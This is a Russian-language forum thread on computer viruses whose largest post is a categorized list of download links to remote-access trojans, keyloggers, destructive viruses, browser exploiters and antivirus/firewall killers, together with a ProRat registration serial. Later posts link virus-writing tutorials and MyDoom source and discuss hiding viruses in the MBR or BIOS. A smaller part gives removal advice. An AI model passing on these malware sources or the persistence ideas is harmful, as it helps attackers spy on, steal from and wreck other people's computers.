Вирусы

[Ma-stiff]

В этой теме предлагаю выкладывать все вири, какие знаете (или самые рульные, на ваш взгляд), где брать, исходники, средства защиты и т.д.
Да, и ещё вопрос:
возможно ли, чтобы после форматирования диска на нём остался вирус, который бы попал в систему после её установки? Если глупость сморозил - сорри, по незнанию, потому и спрашиваю.

 

[somebody]

насколько я понимаю, возможно, если вирус размещается не в доступной области hdd, а в его загрузочной области

 

[acme]

есть вирусы, которые прописываются в MBR

MBR - Master Boot Record. Это запись (программный код и данные), которая загружается в память с жесткого и обеспечивает опознание логических разделов на нем, определяет активный раздел и загружает из него загрузочную запись (Boot Record - BR), которая продолжит запуск операционной системы.

Очистить MBR легко - достаточно запустить c загр. дискеты fdisk с ключом mbr:
fdisk /mbr

но, если у вас несколько ОСей (xp+2k; XP+nix, неважно), то лоадер слетит нах...


вирусами не занимаюсь, следовательно особо не разбераюсь...

 

[«Aна®xист»]

Hacking Programs :

1- Trojans

Tequila Bandita v1.2F (http://int.alshmokh.com/prog/Tequila%20Bandita%20v1.2F.rar)

Institution 2004 0.4.0 (http://int.alshmokh.com/prog/I2K4-0.4.0.zip)

Evade trojan v1.1b (http://int.alshmokh.com/prog/Evade%20trojan%20v1.1b.zip)

Tequila Bandita 1.2 b3 (http://int.alshmokh.com/prog/Tequila%20Bandita%201.2%20b3.rar)

4U (http://int.alshmokh.com/prog/BioNet%20v4%20BE.rar)

BioNet v4 BE (http://int.alshmokh.com/prog/BioNet%20v4%20BE.rar)

Amitis 1.3 (http://int.alshmokh.com/prog/Amitis1.3.zip)

Amitis1.4 (http://int.alshmokh.com/prog/Amitis1.4.zip)

FLUX (http://int.alshmokh.com/prog/FLUX.rar)

Flux v1.01 Pack (http://int.alshmokh.com/prog/Flux%20v1.01%20Pack.rar)

Anal FTP V1.0 (http://int.alshmokh.com/prog/AnalFTP01.zip)

Assasin V1.1 (http://int.alshmokh.com/prog/asassin1.1.zip)

Assasin V2.0 (http://int.alshmokh.com/prog/assasin2.zip)

Audio Stream Ttrjoan (http://int.alshmokh.com/prog/audiostreamtrjan.zip)

Back 21 (http://int.alshmokh.com/prog/back21.zip)

theta (http://int.alshmokh.com/prog/theta_1.zip)

beast_190 (http://int.alshmokh.com/prog/beast_190.zip)

beast_191 (http://int.alshmokh.com/prog/beast_191.zip)

beast_192 (http://int.alshmokh.com/prog/beast_192.zip)

Beast V2.02 (http://int.alshmokh.com/prog/beast_202.zip)

Beast V2.05 (http://int.alshmokh.com/prog/beast_205.zip)

Beast V2.06 (http://int.alshmokh.com/prog/beast_206.zip)

Beast V2.07 (http://int.alshmokh.com/prog/beast_207.zip)

BK trojan - (http://int.alshmokh.com/prog/bk.zip)

Black Attack (http://int.alshmokh.com/prog/black%20attack.zip)

BN318X (http://int.alshmokh.com/prog/BN318X.zip)

Camera Shy V0.2.23.1 (http://int.alshmokh.com/prog/CameraShy.0.2.23.1.zip)

yahoocam(http://int.alshmokh.com/prog/yahoocam.zip)

Cyber Spy (http://int.alshmokh.com/prog/Ccyberspy.zip)

CIA 1.20 (http://int.alshmokh.com/prog/CIA1.2.zip)

CIA 1.21 (http://int.alshmokh.com/prog/CIA1.21.zip)

CIA 1.22 (http://int.alshmokh.com/prog/CIA1.22.zip)

CIA V1.22b Password Crack (http://int.alshmokh.com/prog/CIA%20V1.22b%20Password%20Crack.zip)

CIA v1.23 PublicBeta (http://int.alshmokh.com/prog/CIA%20v1.23%20PublicBeta%201.zip)

Client V1.3 (http://int.alshmokh.com/prog/Client1_3.zip)

Cold Fusion V1.0 (http://int.alshmokh.com/prog/ColdFusionv100.zip)

A-311_Dea†h_1'02 (http://int.alshmokh.com/prog/A-Death.zip)

Freak V1.00 (http://int.alshmokh.com/prog/freak%20v1.00.zip)

Ftp Trojan (http://int.alshmokh.com/prog/ftp%20trojan.zip)

Ghost Voice (http://int.alshmokh.com/prog/GhostVoice.zip)

Http RAT (http://int.alshmokh.com/prog/httprat.zip)

Inject (http://int.alshmokh.com/prog/inject.zip)

hanuman (http://int.alshmokh.com/prog/hanuman.zip)

Insurrection (http://int.alshmokh.com/prog/insurrection.zip)

Kanas Trojan (http://int.alshmokh.com/prog/kanas%20trojan.zip)

KDX Client Win (http://int.alshmokh.com/prog/KDXClient-Win.zip)

LAN filtrator V1.0 (http://int.alshmokh.com/prog/LANfiltrator1.0.zip)

Lithium V1.02 (http://int.alshmokh.com/prog/lithium102.zip)

Lithium V1.02 (http://int.alshmokh.com/prog/lithium103.zip)

MosuCKer V2.3a (http://int.alshmokh.com/prog/mosucker_2.3a.zip)

Neoturk Trojan 1.5 (http://int.alshmokh.com/prog/neoturk_1.5_full.zip)

Netbus Trojan 1.7 (http://int.alshmokh.com/prog/netbus1.7.zip)

infectview (http://int.alshmokh.com/prog/infectview.zip)

NetDevil V1.4 (http://int.alshmokh.com/prog/netdevil1.4.zip)

NetDevil V1.5 (http://int.alshmokh.com/prog/netdevil1.5.zip)

Nethief Trojan (http://int.alshmokh.com/prog/Nethief.zip)

Nova V1.0 (http://int.alshmokh.com/prog/Nova_1.0.zip)

NuclearFTPd V10 (http://int.alshmokh.com/prog/NuclearFTPd10.zip)

Nuclear Prank (http://int.alshmokh.com/prog/NuclearPrank.zip)

Nuclear RAT V4.10 (http://int.alshmokh.com/prog/NuclearRATBeta4.10.zip)

Nuclear RAT v1.0 PublicBeta 6 (http://int.alshmokh.com/prog/Nuclear%20RAT%20v1.0%20PublicBeta%206.zip)

Optixpro V1.1 (http://int.alshmokh.com/prog/optixpro1.1.zip)

OptixPro V1.2 (http://int.alshmokh.com/prog/optixPro1.2.zip)

OptixPro V1.31 (http://int.alshmokh.com/prog/optixPro1.31.zip)

OptixPro V1.32 (http://int.alshmokh.com/prog/optixPro1.32.zip)

OptixPro V1.33 arabic нПЪг ЗббЫе ЗбЪСИне (http://int.alshmokh.com/prog/optixpro1.33arb.zip)

ProRat V1.5 Special Edition (http://int.alshmokh.com/prog/proratv1.5.se.zip)

для регистрации:
username : hediye
Serial: FC12C1D69930

Prorat1.6 Special-Edition (http://int.alshmokh.com/prog/prorat1.6special-edition.rar)

ProRat V1.8 (http://int.alshmokh.com/prog/ProRat_v1.8.zip)

ProRat V1.9 (http://int.alshmokh.com/prog/ProRat_v1.9.zip)

ProRat v1.9 FIX (http://int.alshmokh.com/prog/ProRat%20v1.9%20FIX.zip)

ProCracker v1.9 (http://int.alshmokh.com/prog/ProCracker%20v1.9.exe)

RemoteKit.zip (http://int.alshmokh.com/prog/RemoteKit.zip)

RPC2 hacking (http://int.alshmokh.com/prog/RPC2%20hacking.zip)

Silent Spy V2.10 (http://int.alshmokh.com/prog/Silent%20Spy%20v2.10.zip)


Zdem0n 126 (http://int.alshmokh.com/prog/Zdem0n126.zip)

Infector NG-pub (http://int.alshmokh.com/prog/Infector%20NG-pub.zip)


_______________________________________________________________________________________

2-Key Loggers

SC KeyLogger 2.25 (http://int.alshmokh.com/prog/SC-KeyLog_225.exe)

Perfect Keylogger (http://int.alshmokh.com//security/perfect%20keylogger.rar)

GOD V1.0 Keylogger (http://int.alshmokh.com/prog/GOD1.0.zip)

GOD V2.0 Keylogger (http://int.alshmokh.com/prog/God2.0..zip)

GIRLF (http://int.alshmokh.com/prog/GIRLF.ZIP)

IK Keylogger (http://int.alshmokh.com/prog/ik.zip)

keylogger.zip (http://int.alshmokh.com/prog/keylogger.zip)

keylogger_1P.zip (http://int.alshmokh.com/prog/keylogger_1.zip)

(http://int.alshmokh.com/prog/les%20ali.zip)

SC-KeyLogger V2.2 (http://int.alshmokh.com/prog/SC-KeyLog2.2.rar)

SC keyloger V2.23 (http://int.alshmokh.com/prog/SC-keylog2.23.zip)

SC keyloger V2.24 (http://int.alshmokh.com/prog/SC-KeyLog%202.24.exe)


_______________________________________________________________________________________

3-Viruses


Win32.SKA Virus (http://int.alshmokh.com/prog/viruses/Win32.SKA.zip)

Digital Doom worm (http://int.alshmokh.com/prog/viruses/digital%20doom.zip)

wormTROJAN V10b (http://int.alshmokh.com/prog/viruses/wormtrojan10b.exe)

HardDriveKillerPro(http://int.alshmokh.com/prog/viruses/HardDriveKillerPro.zip)

(http://int.alshmokh.com/prog/viruses/cih_12.zip)

(http://int.alshmokh.com/prog/viruses/cih_14.zip)

COOKIE virus (http://int.alshmokh.com/prog/viruses/cookie.zip)

DAMAGE virus (http://int.alshmokh.com/prog/viruses/damage.zip)

XP Killer (http://int.alshmokh.com/prog/XP%20Killer.rar)

(http://int.alshmokh.com/prog/viruses/dexe.zip)

(http://int.alshmokh.com/prog/viruses/VGA%20burn.zip)

DANGEROUS DAMAGE virus (http://int.alshmokh.com/prog/viruses/dnger.zip)

Gm (http://int.alshmokh.com/prog/viruses/gm.zip)

GROOVIE virus (http://int.alshmokh.com/prog/viruses/groovie.zip)

HOOKER virus (http://int.alshmokh.com/prog/viruses/hooker.zip)

LOVELETTER virus (http://int.alshmokh.com/prog/viruses/loveletter.zip)

LOVESAN virus (http://int.alshmokh.com/prog/viruses/lovesan%20virus.zip)

MELISSA virus (http://int.alshmokh.com/prog/viruses/melissa.zip)

(http://int.alshmokh.com/prog/viruses/motherboard%20damage.zip)

PICTURE virus (http://int.alshmokh.com/prog/viruses/picture.zip)

PSD2000 virus (http://int.alshmokh.com/prog/viruses/psd2000.zip)

(http://int.alshmokh.com/prog/viruses/reject.zip)

USSR-696 virus (http://int.alshmokh.com/prog/viruses/ussr-696.zip)

ZEROBUG virus (http://int.alshmokh.com/prog/viruses/zerobug.zip)

_______________________________________________________________________________________

4-Hacking Severs & Networks

ApreTut (http://int.alshmokh.com/prog/ApreTut.zip)

Hacking Kit (http://int.alshmokh.com/prog/hack_kit.zip)

LAN Sniffer (http://int.alshmokh.com/prog/LANSniffer.zip)

LAN filtrator V1.0 (http://int.alshmokh.com/prog/LANfiltrator1.0.zip)

LAN Sniffer (http://int.alshmokh.com/prog/LANSniffer.zip)

Tunneld V2 (http://int.alshmokh.com/prog/Tunneld2.zip)

Bifrost (http://int.alshmokh.com/prog/Bifrost.zip)

tb V.1.0 (http://int.alshmokh.com/prog/tbv1.zip)

FLUX (http://int.alshmokh.com/prog/FLUX.rar)

_______________________________________________________________________________________

5- IE Exploiting


IE Exploiter 2.00 (http://int.alshmokh.com/prog/IEX.zip)

God Will 106 for IE 5.5 exploiting (http://int.alshmokh.com/prog/godwill106.zip)

Infect View (http://int.alshmokh.com/prog/infectview.zip)

Inferno Nuker (http://int.alshmokh.com/prog/inferno%20nuker.zip)

edHtml (http://int.alshmokh.com/prog/edHtml.zip)

_______________________________________________________________________________________

6- AV/FW Bypass

Aphex RootKit 2003 (http://int.alshmokh.com/prog/rootkit.zip)

Anti V1.0 (http://int.alshmokh.com/prog/anti1.zip)

Back Stealth (http://int.alshmokh.com/prog/backstealth.zip)

K FW & AV Killer (http://int.alshmokh.com/prog/kkiller.zip)

Optix Killer V3 (http://int.alshmokh.com/prog/optixkiller3.zip)

Tech AV/FW Killer (http://int.alshmokh.com/prog/TechKiller.zip)

Zone Alarm Killer (http://int.alshmokh.com/prog/zonekiller.zip)
--------------------------------------------------------------------------------

Добавлено [time]1107257245[/time]
http://quantegymuzik.com/trouz.html

 

[vanes]

:help: народ , помогите, у меня куча вирусов , с названиями: ___j , ___u , ___g и т.д. , антивирь их не удаляет... А из-за них УЖАСНО лагает комп...
КАК их можно УДАЛИТЬ ??? :unsure:

 

[Winux]

Выруби сперва их из диспетчера, почисть авторан. Потом зайдешь и сотрешь как обычные файлы.

 

[Foxa]

vanes

Смени расширение и имя... потом перезагрузись и удали файлы.

 

[Падонак]

то «Aна®xист» сенки за вирьё) я пополнил коллекцию )
слух а у тя нет случайно Parit или пирата =) ета сетевая шняга которая кушает .exe

 

[red_byte]

Скриншот|Screenshot

 

[+toxa+]

Исходники MyDoom.a

 

[[500mhz]]

самый навороченый вир всех времен и народов (мсдос правда)
http://ve.nod32.ch/viruses/z/zhengi.php

 

[badk!tten]

2 Ma-stiff

Мой однокурскник написал (непроверенная инфа!) вирь, который может скидываться в BIOS-Flash и, соответственно, считываться при загрузке.

Хотя есть более простые способы.

 

[Ma-stiff]

Продолжая тему нестираемых вирей:
есть ли какая-то область, откуда вирь, если он туда запишется, невозможно стереть, по крайней мере не обращаясь в сервис-центр?

 

[Ŧ1LAN]

RTF - Вирус на VBS
http://www.hackersfaqs.h11.ru/articlez/rtf_virus_na_vbs.php
Happy_New_year - пишем свой мини вирус на VB 5.0
http://www.hackersfaqs.h11.ru/articlez/Hap...us_na_VB_50.php
Вирь "дискетный"
http://www.hackersfaqs.h11.ru/articlez/Vir_disketnyi.php
простой пример MS-DOS вируса
http://attack-on-web.com/cgi-bin/Statii_at...rostoi_worm.htm
Вирус-червь (ArhiWorm)
http://www.hackersfaqs.h11.ru/articlez/Vir..._(ArhiWorm).php

Вот несколько статеек по написанию вирусов.

 

[Sanchous]

есть ли какая-то область, откуда вирь, если он туда запишется, невозможно стереть, по крайней мере не обращаясь в сервис-центр?

Есть. Запиши в BIOS. Заменив написанный злыми дядьками кусок кода на цитату из "Войны и мира", ты запросто сможешь смело нести свой комп в сервисный центр... Решение проблемы просто до слез: меням перемычку на соответствующем разъеме материнской платы в положение Read-Only и забываем обо всей этой бодяге...

 

[Polas]

есть ли какая-то область, откуда вирь, если он туда запишется, невозможно стереть, по крайней мере не обращаясь в сервис-центр?

Есть. Запиши в BIOS. Заменив написанный злыми дядьками кусок кода на цитату из "Войны и мира", ты запросто сможешь смело нести свой комп в сервисный центр... Решение проблемы просто до слез: меням перемычку на соответствующем разъеме материнской платы в положение Read-Only и забываем обо всей этой бодяге...

На всех новых материнках есть система антикраш биоса, то есть если ческума вдруг при загрузке несовпадет эта лабуда воостановиться, либо с дискеты(которю обязан обновлять ты сам), либо с реад онли устройства каторое прихерачено к мотхерборду!

 

[Sanchous]

На всех новых материнках есть система антикраш биоса

Если честно, не слышал...
Но даже если так... Думаешь, у всех стоят материнки с "аникрашем биоса".
А что чексам самому вручную изменить нельзя? Ведь если она есть, то её можно изменить И вообще, нафиг этот гимор? Перемычка - мой выбор! Дискеты, прихреняченные устройства... Нафиг надо! И потом, на моей материнке (Albatron KX18D Pro) такой фигни (аникрашем биоса) нет... А ведь она не такая уж и старая, половина юзверей инета сидят и на более старших тетях А если учесть, что вирусы распространяются через инет в основном, а для веба нужен не очень мощный комп, если не сказать резче - слабый, то идея с цитированием Толстого рулит, ИМХО

 

[Polas]

На всех новых материнках есть система антикраш биоса

Если честно, не слышал...
Но даже если так... Думаешь, у всех стоят материнки с "аникрашем биоса".
А что чексам самому вручную изменить нельзя? Ведь если она есть, то её можно изменить И вообще, нафиг этот гимор? Перемычка - мой выбор! Дискеты, прихреняченные устройства... Нафиг надо! И потом, на моей материнке (Albatron KX18D Pro) такой фигни (аникрашем биоса) нет... А ведь она не такая уж и старая, половина юзверей инета сидят и на более старших тетях А если учесть, что вирусы распространяются через инет в основном, а для веба нужен не очень мощный комп, если не сказать резче - слабый, то идея с цитированием Толстого рулит, ИМХО

Тогда поставлю вопрос подругому: на большинстве старых мотхербордов биос стоит в режиме тока чтение, а на самых старых. чтобы записать вааще надо было засветить какую то поверхность и тока тогда она будет писать!
Добавлено в [time]1131871227[/time]
да чуть не забыл. вообщем итог - заразиться оочень маленькое количество компов не очень сильной мочности, - кому это надо? просто записать в небольшое пространство биоса толстого, тока потому что ты его так любишь и хочешь всем показать какой это рульный писатель? врядли те кто схватят вирус поймут твои литературные пристрастия!

 

[Sanchous]

просто записать в небольшое пространство биоса толстого, тока потому что ты его так любишь и хочешь всем показать какой это рульный писатель? врядли те кто схватят вирус поймут твои литературные пристрастия!

Во-первых, Блокнотом Толстого там прочитать не получится
А во-вторых...

есть ли какая-то область, откуда вирь, если он туда запишется, невозможно стереть, по крайней мере не обращаясь в сервис-центр?

Я не ставлю целью заразить как можно большее кол-во машин, а отвечаю на конкретно поставленный вопрос!..
Впрочем, справедливости ради отмечу, что перемычка на платах по умолчанию стоит в положении "только чтение". Хотя, как известно, умников хватает